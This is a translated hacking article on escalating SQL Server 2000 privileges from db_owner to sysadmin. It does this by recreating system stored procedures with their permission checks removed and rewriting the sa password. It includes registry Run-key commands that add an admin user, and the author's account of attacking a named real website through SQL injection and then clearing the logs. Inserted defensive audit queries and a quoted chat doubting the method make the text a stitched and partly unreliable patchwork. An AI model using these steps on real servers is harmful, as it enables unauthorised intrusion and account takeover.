PS: The blog is empty because I am lazy. This is the old article again. Well, as you said, I still have a lot to say ...
Don't ask me about it here; I don't know, I didn't see anything!!!
Disclaimer: This article is for teaching purposes only, and the author is not responsible for the consequences of any attack based on it. Because the method was found to be too harmful, the original text has been cut down and modified. Even so, this article is still very powerful, so please do not carry out any destructive operations against domestic sites.
After thinking it over three times, I decided to publish it anyway. This trick is poisonous and its range is wide: it can be said that as long as a site has a SQL injection vulnerability, this method gets a WebShell or even system privileges 99% of the time (not daring to say more, heh; I have hundreds of real "practical exercises", and basically 100% of them ended in a WebShell or even system privileges).
I remember that in "MSSQL DB_OWNER role injection: getting system privileges directly (continued)" I described a method of obtaining system privileges with xp_regwrite:
xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'xwq1', 'REG_SZ', 'net user xwq xwq /add'
xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'xwq2', 'REG_SZ', 'net localgroup administrators xwq /add'
As long as the website's server restarts, you get system privileges. After hundreds of real experiments, this method turned out not to be very practical: it easily attracts the attention of the administrator, a DDoS is itself a violation (even for good people), and moving that much manpower and material into a DDoS costs too much (depending on how many bots you have). So it is not feasible (unless you really want that particular site).
Oh, so much preamble; you may be getting impatient. Good, so now I introduce one of my three killer techniques: the universal privilege escalation (万能提权).
If a website has a SQL injection vulnerability and connects to the database with a login in the sysadmin fixed server role (in plain terms, sa; beginners can think of it that way), then getting a WebShell or system privileges is, heh, a piece of cake. As far as I know, sysadmin privileges give at least 10 ways to get a WebShell or system privileges, maybe more (and even if only 10). How to get a WebShell or system privileges from sysadmin I won't repeat; everyone is surely familiar with it. But what if the website only has DB_OWNER permissions? What do you do then, how do you escalate privileges, how do you get a WebShell (without an upload vulnerability and without database backup)? Everyone may answer "back up a shell". I remember that LCX also said in "MSSQL DB_OWNER role injection: getting system privileges directly" that the shell obtained by backup is just theoretical: if a WebShell is 20MB, can you still use it? Oh, if I tell you that DB_OWNER can get a WebShell or system privileges just as easily as sysadmin, what is your reaction? Is it a bit incredible? Or is it me who is incredible? (If you don't believe it, friend, don't read the content below.)
Oh, is it tickling you, can't you wait to find out? I won't talk any more; here I tell everyone about one of my three killer techniques, the universal privilege escalation method.
Before explaining it, let's do an experiment first.
Experimental environment: Windows XP SP1, SQL Server 2000 SP3. Everyone follow me step by step. First create a new database user with db_owner permission; here mine is xwq (don't select anything under server roles; tick db_owner under database roles). OK, now open Query Analyzer, connect as xwq, and enter sp_addlogin xuwenqiang. Run it. What do we get?
Server: Msg 2571, Level 14, State 2, Procedure sp_addlogin, Line 16
User 'xwq' does not have permission to run DBCC AUDITEVENT.
Server: Msg 15247, Level 16, State 1, Procedure sp_addlogin, Line 17
User does not have permission to perform this action.
The error messages above are normal, because only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin. So how can I make sp_addlogin usable by me? Let's look at the code of sp_addlogin:
create procedure sp_addlogin
    @loginame       sysname
    ,@passwd        sysname = NULL
    ,@defdb         sysname = 'master'      -- UNDONE: DEFAULT CONFIGURABLE???
    ,@deflanguage   sysname = NULL
    ,@sid           varbinary(16) = NULL
    ,@encryptopt    varchar(20) = NULL
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret    int     -- return value of sp call

    -- CHECK PERMISSIONS --
    if (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
    begin
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
    end

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end

    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL LOGIN)
    --  (2) No backslash (NT LOGIN ONLY)
    --  (3) Not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end
    -- Note: Different case of sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- LOGIN NAME MUST NOT ALREADY EXIST --
    if exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end

    -- VALIDATE DEFAULT DATABASE --
    if db_id(@defdb) is null
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end

    -- VALIDATE DEFAULT LANGUAGE --
    if (@deflanguage is not null)
    begin
        execute @ret = sp_validlang @deflanguage
        if (@ret <> 0)
            return (1)
    end
    else
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid     -- server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end

    -- VALIDATE SID IF GIVEN --
    if ((@sid is not null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) is not null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end

    -- VALIDATE AND USE ENCRYPTION OPTION --
    declare @xstatus smallint
    select @xstatus = 2     -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800,     -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end

    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
    insert into master.dbo.sysxlogins values
        (NULL, @sid, @xstatus, getdate(),
        getdate(), @loginame, convert(varbinary(256), @passwd),
        db_id(@defdb), @deflanguage)
    if @@error <> 0     -- this indicates we cut duplicate row
        return (1)

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    raiserror(15298,-1,-1)
    return (0)  -- sp_addlogin
go
The reason only members of the sysadmin and securityadmin fixed server roles can execute sp_addlogin is mainly this piece of code:
    -- CHECK PERMISSIONS --
    if (not is_srvrolemember('securityadmin') = 1)
    begin
        dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
        raiserror(15247,-1,-1)
        return (1)
    end
    else
    begin
        dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
    end
As long as we delete this code, a user with any permissions can add logins.
OK, first drop sp_addlogin:
drop procedure sp_addlogin
Then recreate sp_addlogin:
create procedure sp_addlogin
    @loginame       sysname
    ,@passwd        sysname = NULL
    ,@defdb         sysname = 'master'      -- UNDONE: DEFAULT CONFIGURABLE???
    ,@deflanguage   sysname = NULL
    ,@sid           varbinary(16) = NULL
    ,@encryptopt    varchar(20) = NULL
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret    int     -- return value of sp call

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addlogin')
        return (1)
    end

    -- VALIDATE LOGIN NAME AS:
    --  (1) Valid SQL Name (SQL LOGIN)
    --  (2) No backslash (NT LOGIN ONLY)
    --  (3) Not a reserved login name
    execute @ret = sp_validname @loginame
    if (@ret <> 0)
        return (1)
    if (charindex('\', @loginame) > 0)
    begin
        raiserror(15006,-1,-1,@loginame)
        return (1)
    end
    -- Note: Different case of sa is allowed.
    if (@loginame = 'sa' or lower(@loginame) in ('public'))
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- LOGIN NAME MUST NOT ALREADY EXIST --
    if exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        raiserror(15025,-1,-1,@loginame)
        return (1)
    end

    -- VALIDATE DEFAULT DATABASE --
    if db_id(@defdb) is null
    begin
        raiserror(15010,-1,-1,@defdb)
        return (1)
    end

    -- VALIDATE DEFAULT LANGUAGE --
    if (@deflanguage is not null)
    begin
        execute @ret = sp_validlang @deflanguage
        if (@ret <> 0)
            return (1)
    end
    else
    begin
        select @deflanguage = name from master.dbo.syslanguages
            where langid = @@default_langid     -- server default language
        if @deflanguage is null
            select @deflanguage = N'us_english'
    end

    -- VALIDATE SID IF GIVEN --
    if ((@sid is not null) and (datalength(@sid) <> 16))
    begin
        raiserror(15419,-1,-1)
        return (1)
    end
    else if @sid is null
        select @sid = newid()
    if (suser_sname(@sid) is not null)
    begin
        raiserror(15433,-1,-1)
        return (1)
    end

    -- VALIDATE AND USE ENCRYPTION OPTION --
    declare @xstatus smallint
    select @xstatus = 2     -- access
    if @encryptopt is null
        select @passwd = pwdencrypt(@passwd)
    else if @encryptopt = 'skip_encryption_old'
    begin
        select @xstatus = @xstatus | 0x800,     -- old-style encryption
               @passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
    end
    else if @encryptopt <> 'skip_encryption'
    begin
        raiserror(15600,-1,-1,'sp_addlogin')
        return 1
    end

    -- ATTEMPT THE INSERT OF THE NEW LOGIN --
    insert into master.dbo.sysxlogins values
        (NULL, @sid, @xstatus, getdate(),
        getdate(), @loginame, convert(varbinary(256), @passwd),
        db_id(@defdb), @deflanguage)
    if @@error <> 0     -- this indicates we cut duplicate row
        return (1)

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    raiserror(15298,-1,-1)
    return (0)  -- sp_addlogin
go
Now I can add logins. OK, in Query Analyzer enter sp_addlogin xuwenqiang and run it. Good! It returns "New login created." I have created a login xuwenqiang, but of course I did not do this for nothing: I have to turn it into a user with the highest permissions, which in SQL Server is of course sysadmin. Turning a user into a sysadmin needs only the stored procedure sp_addsrvrolemember, but only users with sysadmin privileges can use it. Annoying? Let it serve me anyway, heh. Smart readers must already have thought of how: I only have DB_OWNER privilege, so how do I use sp_addsrvrolemember? Yes, the same way as with sp_addlogin: as long as the permission check in sp_addsrvrolemember is removed, we can add sysadmin members. Let's look at the code of sp_addsrvrolemember:
create procedure sp_addsrvrolemember
    @loginame   sysname,            -- login name
    @rolename   sysname = NULL      -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret        int,    -- return value of sp call
            @rolebit    smallint,
            @ismem      int

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end

    -- AUDIT A SUCCESSFUL SECURITY CHECK --
    dbcc auditevent (108, 1, 1, @loginame, NULL, @rolename, NULL)

    -- CANNOT CHANGE SA ROLES --
    if @loginame = 'sa'
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = case @rolename
                        when 'sysadmin'         then 16
                        when 'securityadmin'    then 32
                        when 'serveradmin'      then 64
                        when 'setupadmin'       then 128
                        when 'processadmin'     then 256
                        when 'diskadmin'        then 512
                        when 'dbcreator'        then 1024
                        when 'bulkadmin'        then 4096
                        else NULL end

    -- ADD ROW FOR NT LOGIN IF NEEDED --
    if not exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end

    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate()
        where name = @loginame and srvid is null

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    raiserror(15488,-1,-1,@loginame,@rolename)

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    return (@@error)    -- sp_addsrvrolemember
go
Remove this section:
    -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
    select @ismem = is_srvrolemember(@rolename)
    if @ismem is null
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15402,-1,-1,@rolename)
        return (1)
    end
    if @ismem = 0
    begin
        dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
        raiserror(15247,-1,-1)
        return (1)
    end
This way we can arbitrarily add sysadmin members, heh, cool. In Query Analyzer enter sp_addsrvrolemember xuwenqiang, sysadmin. Yeah!!!!!!!! Success. So here, using a user with only DB_OWNER privileges, we have created a login with the highest privileges in SQL Server, that is, user xuwenqiang with sysadmin permissions, and with sysadmin permissions isn't a WebShell or system privileges easy? Don't fix your eyes only on the two stored procedures I talked about, sp_addlogin and sp_addsrvrolemember. Any stored procedure that only sysadmin can use, we can make usable to ourselves with my universal privilege escalation killer technique. For example: sp_configure, sp_addlinkedserver, sp_addlinkedsrvlogin, sp_makewebtask, etc. We can make all of them usable with less than sysadmin permission.
Let's take another example of universal privilege escalation: creating a perfect back door that will never be killed.
We all know there is a login in SQL Server that is called a back door, that is, sa. sa is a built-in administrator login and cannot be changed or deleted. Oh, that is what M$ says; if you have read another article I wrote, "Completely deleting the sa back door", you know that in fact sa can be deleted too. We know that in SQL Server the stored procedure for changing passwords is sp_password, but we must know the user's old password to change it. So is there no way to change sa's password without knowing the old one? There is, through sp_configure. sp_configure displays or changes the global configuration settings of the current server. Execute permission on sp_configure (with the option to change configuration) is granted by default to the sysadmin and serveradmin fixed server roles. This is easy: delete the permission-check segment in sp_configure, rebuild it, and we can use it.
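The trick described above leaves traces a DBA can check for. The query below is an added example (not from the original article and not Microsoft's code) for SQL Server 2000: it assumes the SQL 2000 catalog tables master.dbo.sysobjects and master.dbo.syscomments and a session with sysadmin rights. A procedure that has been dropped and recreated by a user is no longer flagged as a Microsoft-shipped object, gets a fresh creation date, and, in the variant the article shows, no longer contains the is_srvrolemember check in its body; the query surfaces all three signals for the procedures the article names. The watch list is an assumption of the example and can be extended.

```sql
-- Added example: integrity check for security-sensitive system procedures in master
-- (SQL Server 2000). Run as sysadmin.
use master
go
set nocount on

-- Procedures whose shipped body contains a permission check of the form
-- "if (not is_srvrolemember(...) = 1)". The list is an assumption of this example.
declare @watched table (name sysname, expect_check varchar(40))
insert into @watched values ('sp_addlogin',          'is_srvrolemember')
insert into @watched values ('sp_addsrvrolemember',  'is_srvrolemember')
insert into @watched values ('sp_password',          'is_srvrolemember')
insert into @watched values ('sp_addlinkedserver',   'is_srvrolemember')
insert into @watched values ('sp_addlinkedsrvlogin', 'is_srvrolemember')

-- 1. For each watched procedure: is it still marked as shipped by Microsoft, when was it
--    created, and does any row of its source text still contain the permission check?
--    (syscomments splits long bodies into 4000-character rows, so a check string that
--    happens to straddle a row boundary would show as 0; treat 0 as "inspect by hand".)
select o.name,
       o.crdate,
       is_ms_shipped  = objectproperty(o.id, 'IsMSShipped'),
       body_has_check = case when exists (select 1 from syscomments c
                                          where c.id = o.id
                                            and c.text like '%' + w.expect_check + '%')
                             then 1 else 0 end
from sysobjects o
join @watched w on w.name = o.name
where o.xtype = 'P'
order by o.crdate desc

-- 2. A watched procedure that is missing entirely (dropped, not yet recreated) is a finding too.
select w.name as missing_procedure
from @watched w
where not exists (select 1 from sysobjects o where o.name = w.name and o.xtype = 'P')
go
```

Any row with is_ms_shipped = 0, a crdate later than the instance was installed or patched, or body_has_check = 0 means the procedure text should be compared against a known-good copy with sp_helptext before the server is trusted again.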
create procedure sp_configure --- 1996/08/14 09:43
    @configname     varchar(35) = NULL  -- option name to configure
    ,@configvalue   int = NULL          -- new configuration value
as
    set nocount on
    declare
        @confignum      int     -- num of the opt to be configured
        ,@configcount   int     -- num of options like @configname
        ,@show_advance  int     -- Y/N read & write actions on 'advanced' opts
    declare @fullconfigname varchar(35)
    declare @prevvalue int

    /*
    ** Determine @show_advance based on advanced option in syscurconfigs.
    */
    if (select value from master.dbo.syscurconfigs where config = 518) = 1
        select @show_advance = 1    -- display advanced options
    else
        select @show_advance = 0    -- don't display advanced options

    /*
    ** Make certain that max user info. reflects any AddPak upgrades.
    */
    if (select high from master.dbo.spt_values where number = 103 and type = 'C')
            <> @@max_connections
        update master.dbo.spt_values
            set high = @@max_connections
            where number = 103
              and type = 'C'

    /*
    ** If no option name is given, the procedure will just print out all the
    ** options and their values.
    */
    if @configname is null
    begin
        select name, minimum = low, maximum = high,
               config_value = c.value,
               run_value = master.dbo.syscurconfigs.value
        from master.dbo.spt_values, master.dbo.sysconfigures c,
             master.dbo.syscurconfigs
        where type = 'C'
          and number = c.config
          and number = master.dbo.syscurconfigs.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        order by lower(name)
        return (0)
    end

    /*
    ** Use @configname and try to find the right option.
    ** If there isn't just one, print appropriate diagnostics and return.
    */
    select @configcount = count(*), @fullconfigname = min(v.name),
           @prevvalue = min(c.value)
    from master.dbo.spt_values v, master.dbo.sysconfigures c
    where v.name like '%' + @configname + '%' and v.type = 'C'
      and v.number = c.config
      and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

    /*
    ** If no option, show the user what the options are.
    */
    if @configcount = 0
    begin
        raiserror(15123,-1,-1,@configname)
        print ''
        raiserror(15456,-1,-1)
        /*
        ** Show the user what the options are.
        */
        select name, minimum = low, maximum = high,
               config_value = c.value,
               run_value = master.dbo.syscurconfigs.value
        from master.dbo.spt_values, master.dbo.sysconfigures c,
             master.dbo.syscurconfigs
        where type = 'C'
          and number = c.config
          and number = master.dbo.syscurconfigs.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        return (1)
    end

    /*
    ** If more than one option like @configname, show the duplicates and return.
    */
    if @configcount > 1
    begin
        raiserror(15124,-1,-1,@configname)
        print ''
        select duplicate_options = name
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where name like '%' + @configname + '%'
          and type = 'C'
          and number = c.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        return (1)
    end
    else
        /* There must be exactly one, so get the full name. */
        select @configname = name   -- , @value_in_sysconfigure = c.value
        from master.dbo.spt_values, master.dbo.sysconfigures c
        where name like '%' + @configname + '%' and type = 'C'
          and number = c.config
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

    /*
    ** If @configvalue is null, just show the current state of the option.
    */
    if @configvalue is null
    begin
        select v.name
               ,v.low as 'minimum'
               ,v.high as 'maximum'
               ,c.value as 'config_value'
               ,u.value as 'run_value'
        from master.dbo.spt_values v
             left outer join master.dbo.sysconfigures c on v.number = c.config
             left outer join master.dbo.syscurconfigs u on v.number = u.config
        where v.type = 'C'
          and v.name like '%' + @configname + '%'
          and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))
        return (0)
    end

    /*
    ** Now get the configuration number.
    */
    select @confignum = number
    from master.dbo.spt_values, master.dbo.sysconfigures c
    where type = 'C'
      and (@configvalue between low and high or @configvalue = 0)
      and name like '%' + @configname + '%'
      and number = c.config
      and ((c.status & 2 <> 0 and @show_advance = 1) or (c.status & 2 = 0))

    /*
    ** If this is the number of default language, we want to make sure
    ** that the new value is a valid language id in syslanguages.
    */
    if @confignum = 124
    begin
        if not exists (select * from master.dbo.syslanguages where langid = @configvalue)
        begin
            /* 0 is default language, us_english */
            if @configvalue <> 0
            begin
                raiserror(15127,-1,-1)
                return (1)
            end
        end
    end

    /*
    ** If this is the number of kernel language, we want to make sure
    ** that the new value is a valid language id in syslanguages.
    */
    if @confignum = 132
    begin
        if not exists (select * from master.dbo.syslanguages where langid = @configvalue)
        begin
            /* 0 is default language, us_english */
            if @configvalue <> 0
            begin
                raiserror(15028,-1,-1)
                return (1)
            end
        end
    end

    /*
    ** "user options" should not try to set incompatible options/values.
    */
    if @confignum = 1534    -- "user options"
    begin
        if (@configvalue & (1024|2048) = (1024|2048))   -- ANSI_NULL_DEFAULT_ON/OFF
        begin
            raiserror(15303,-1,-1,@configvalue)
            return (1)
        end
    end

    /*
    ** Although the @configname is good, @configvalue wasn't in range.
    */
    if @confignum is null
    begin
        raiserror(15129,-1,-1,@configvalue,@configname)
        return (1)
    end

    -- Msg 15002, but in 6.5 allow this inside a txn (not check @@trancount) #12828.

    /*
    ** Now update sysconfigures.
    */
    update master.dbo.sysconfigures set value = @configvalue
        where config = @confignum

    /*
    ** Flush the procedure cache - this is to account for options that become
    ** effective immediately (ie. dont need a server restart).
    */
    dbcc freeproccache

    raiserror(15457,-1,-1,@fullconfigname,@prevvalue,@configvalue) with log
    return (0)  -- sp_configure
go
OK, now we run
sp_configure 'allow updates', 1
go
reconfigure with override
go
and changing sa's password becomes easy. Then:
update sysxlogins set password = 0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid = 0x01
and sa's password has been changed to 111111. Oh, the countermeasure is to delete sa. For how to delete it, see "Completely deleting the sa back door".
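The state the article relies on here, 'allow updates' switched on so that sysxlogins can be rewritten with a plain UPDATE, is something a DBA can check and undo directly. The script below is an added example (not from the original article, not Microsoft's code) for SQL Server 2000; it assumes a sysadmin session and the SQL 2000 tables master.dbo.spt_values, sysconfigures, syscurconfigs and sysxlogins. It reports the 'allow updates' value, lists current sysadmin members using the same xstatus bit that sp_addsrvrolemember sets, lists recently created or changed logins, and turns direct system-table updates back off. Note that a direct UPDATE of the password column leaves xdate2 untouched, so the recent-changes list cannot show a password rewrite; that is why the 'allow updates' value itself is the indicator to watch.

```sql
-- Added example: audit of 'allow updates' and sysadmin membership on SQL Server 2000.
-- Run as sysadmin.
use master
go
set nocount on

-- 1. 'allow updates' must be 0. A run_value of 1 means system tables accept plain
--    UPDATE statements, which is what the password rewrite above depends on.
select v.name,
       config_value = c.value,
       run_value    = u.value
from master.dbo.spt_values v
join master.dbo.sysconfigures c on c.config = v.number
join master.dbo.syscurconfigs u on u.config = v.number
where v.type = 'C' and v.name = 'allow updates'

-- 2. Current sysadmin members. Bit 16 of sysxlogins.xstatus is the sysadmin bit,
--    the value the 'sysadmin' branch of sp_addsrvrolemember ORs into xstatus.
select name, xdate1 as created, xdate2 as last_changed
from master.dbo.sysxlogins
where srvid is null and (xstatus & 16) = 16
order by name

-- 3. Logins created or role-changed in the last 7 days. A login added through a
--    recreated sp_addlogin still gets a row here with a fresh xdate1; a sysadmin grant
--    through a recreated sp_addsrvrolemember updates xdate2. (7 days is an assumption.)
select name, xdate1 as created, xdate2 as last_changed, xstatus
from master.dbo.sysxlogins
where srvid is null
  and (xdate1 > dateadd(day, -7, getdate()) or xdate2 > dateadd(day, -7, getdate()))
order by xdate2 desc

-- 4. Close the door: direct updates to system tables off again.
exec sp_configure 'allow updates', 0
reconfigure with override
go
```

Because sp_configure itself may have been recreated, compare its text with sp_helptext before relying on it for the reset; the queries in steps 1 to 3 read the catalog tables directly and do not depend on any procedure.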
Example:
The following is a privilege escalation test I did a while ago against a domestic and very famous site. It was roughly verified; for many reasons, let's call this site www.**173.com. www.**173.com is very famous for games, ranked around 20th at the top (when I tested it). I don't want to say here how I found the injection point; you can still find it, and there are many (the whole test really took a lot of time; don't misunderstand, I don't mean time spent on "testing", but on writing the program during the process; I don't write one-off sample programs, so how could a sample program do what I want? The whole attack took less than 10 minutes).
At the injection point found, GameType=** (depressing; if NBSI2 had existed when I tested, it would have been much easier), you can first enter drop procedure sp_addlogin, then enter (heh, of course in the program I wrote):
(the same sp_addlogin definition with the permission check removed, exactly as recreated in the experiment above)
OK, we create a login: exec master..sp_addlogin xwq
Then drop procedure sp_addsrvrolemember, and enter in IE:
create procedure sp_addsrvrolemember
    @loginame   sysname,            -- login name
    @rolename   sysname = NULL      -- server role name
as
    -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
    set nocount on
    declare @ret        int,    -- return value of sp call
            @rolebit    smallint,
            @ismem      int

    -- DISALLOW USER TRANSACTION --
    set implicit_transactions off
    if (@@trancount > 0)
    begin
        raiserror(15002,-1,-1,'sp_addsrvrolemember')
        return (1)
    end

    -- CANNOT CHANGE SA ROLES --
    if @loginame = 'sa'
    begin
        raiserror(15405,-1,-1,@loginame)
        return (1)
    end

    -- OBTAIN THE BIT FOR THIS ROLE --
    select @rolebit = case @rolename
                        when 'sysadmin'         then 16
                        when 'securityadmin'    then 32
                        when 'serveradmin'      then 64
                        when 'setupadmin'       then 128
                        when 'processadmin'     then 256
                        when 'diskadmin'        then 512
                        when 'dbcreator'        then 1024
                        when 'bulkadmin'        then 4096
                        else NULL end

    -- ADD ROW FOR NT LOGIN IF NEEDED --
    if not exists (select * from master.dbo.syslogins where loginname = @loginame)
    begin
        execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
        if (@ret <> 0)
        begin
            raiserror(15007,-1,-1,@loginame)
            return (1)
        end
    end

    -- UPDATE ROLE MEMBERSHIP --
    update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate()
        where name = @loginame and srvid is null

    -- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
    exec('use master grant all to null')

    raiserror(15488,-1,-1,@loginame,@rolename)

    -- FINALIZATION: RETURN SUCCESS/FAILURE --
    return (@@error)    -- sp_addsrvrolemember
go
Then exec master..sp_addsrvrolemember xwq, sysadmin
We connect with a SQL comprehensive utilization tool or Query Analyzer; heh, success. So we have created a login xwq with the highest permissions on the www.**17173.com server. What follows, I think everyone knows. Oh, because this was only a security test I did not go deeper; I deleted the account, cleared the logs, and left.
So you have seen one of my killer techniques, the universal privilege escalation: as long as you give me an injection point, no matter what permissions, I can give you a WebShell or even system privileges. Oh, actually calling it universal is a bit exaggerated, because the create procedure permission is granted to members of the sysadmin fixed server role and of the db_owner and db_ddladmin fixed database roles, so when you meet a site with only public permissions it is no good.
But don't think that with public permissions there is no way to get a WebShell or system privileges. On the contrary: as far as I know there are at least five ways to get a WebShell or even system privileges from a user with public permissions.
The best prevention is to eliminate the injection vulnerabilities; that is the cure at the root. (Oh, it would be best not to give even public, but there is nothing lower than public; there is no way to stop public from calling many dangerous stored procedures, and public cannot be removed. It seems M$ still loves us "bad people" very much.)
Postscript
This article is based on what I studied at school since installing SQL Server in April 2004; I wrote it at the beginning of December. After that I never released it because the harm was too great. I believe some people in China know about it, just not publicly. After thinking it over three times, I decided to release it. I hope everyone masters it and does not carry out any destructive operation against domestic sites.
In this article I did not mention how to get a WebShell or system privileges from public permissions; I know at least 5 ways to get a WebShell or even system privileges from a user with public permissions (even if only 5 now, there may be more; if there are more masters out there, I hope you can enlighten me, and I thank you in advance).
At an appropriate time I will dedicate the knowledge I have mastered to everyone. Once again: do not destroy any legal host in any country, otherwise the consequences are at your own risk.
---------------------------------------------
Attached: analysis by master Xiaolu in the Xiaolu exchange group:
-----------------------------------------------
Xiaolu 04:10:48
What he says in there cannot be realized at all.
Xiaolu 04:10:58
Saying it is the same as saying nothing.
Xiaolu 04:11:11
Why did he write this article?
(-_- o) 04:11:28
I have also studied it for a long time and I can't achieve it.
The best 7 04:11:38
Count it as an idea.
Xiaolu 04:11:58
Stored procedures are nothing great.
Xiaolu 04:12:09
They simplify operations.
The best 7 04:12:15
Is the idea feasible, Luo?
Xiaolu 04:12:37
If you don't have the permission, you don't get it through a stored procedure either.
Xiaolu 04:13:12
The most critical statement in sp_addlogin is
insert into master.dbo.sysxlogins values
    (NULL, @sid, @xstatus, getdate(),
    getdate(), @loginame, convert(varbinary(256), @passwd),
    db_id(@defdb), @deflanguage)
Xiaolu 04:13:32
The whole thing can be simplified to
insert into master.dbo.sysxlogins values
    (NULL, newid(), 2, getdate(),
    getdate(), 'fengzi', convert(varbinary(256), pwdencrypt('123456')),
    db_id('master'), 'us_english')
Xiaolu 04:14:12
db_owner has no right to write to the sysxlogins table.
Xiaolu 04:14:16
And no right to read it.
(-_- o) 04:15:02
If he really didn't delete many details
Xiaolu 04:17:11
dbo can't do RegWrite.
Xiaolu 04:17:36
Is the dbo he talks about master's dbo?
Attached: MSSQL DB_OWNER role injection: getting system privileges directly (the article referred to above)
I believe everyone is already familiar with ASP + MSSQL injection; even someone who doesn't understand SQL syntax can use NBSI to easily break into a large number of websites. But even a SQL injection master, with only the db_owner role in MSSQL, and unable to guess the website's back end, seems to be at a loss; apart from getting a shell with backup, I have not found a better way of breaking in online. However, the shell obtained by backup is only theoretical: if a WebShell is 20MB, can you still use it? Not long ago I met such a Taiwanese website. The administrator's password was dumped with NBSI, but the username came out as a pile of garbled characters in NBSI because of Traditional Chinese. I also found the back end, but could only stare at it. What to do? I scanned all the ports and found 5900, and guessed that the administrator used VNC to remotely control the server. At this point I had an idea: I could read VNC's encrypted password from the registry and crack it. See my performance! Telnet to port 5900 of the server, and the banner confirms that the server is running VNC.
I believe everyone knows that xp_regread reads the registry. Submit the following statements in turn:
http://www.something.com/scri... create table [dbo].[cyfd] ([gyfd] [char] (255));
This way we successfully create a table named cyfd with one field, gyfd, of type char and length 255. Then add data to the table:
